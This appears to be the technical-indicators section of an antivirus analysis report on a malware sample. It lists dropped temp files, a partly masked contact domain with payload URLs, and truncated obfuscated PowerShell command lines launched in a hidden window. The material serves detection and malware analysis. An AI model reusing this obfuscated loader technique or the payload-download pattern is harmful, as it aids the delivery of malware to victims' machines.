Technical Information
- %APPDATA%\bitd374.tmp
- %APPDATA%\bit26c3.tmp
- %APPDATA%\bitd374.tmp
- %APPDATA%\bit26c3.tmp
- from %APPDATA%\bitd374.tmp to %APPDATA%\overn.anx
- from %APPDATA%\bit26c3.tmp to %APPDATA%\overn.anx
- 'al###naunco.com':80
- http://al###naunco.com/one/Midtpunkts.java
- http://al###naunco.com/cgi-sys/suspendedpage.cgi
- DNS ASK al###naunco.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Muscids609 ([String]$Pagina){For($Lsrepants0=4; $Lsrepants0 -lt $Pagina.Length-1; $Lsrepants0+=(4+1)){$Unscabro=$Pagina.Substring( $Lsrepants0, 1);$Isoamidkly+=$Unscabro};...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Muscids609 ([String]$Pagina){For($Lsrepants0=4; $Lsrepants0 -lt $Pagina.Length-1; $Lsrepants0+=(4+1)){$Unscabro=$Pagina.Substring( $Lsrepants0, 1);$Isoamidkly+=$Unscabro};...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Muscids609 ([String]$Pagina){For($Lsrepants0=4; $Lsrepants0 -lt $Pagina.Length-1; $Lsrepants0+=(4+1)){$Unscabro=$Pagina.Substring( $Lsrepants0, 1);$Isoamidkly+=$Unscabro};...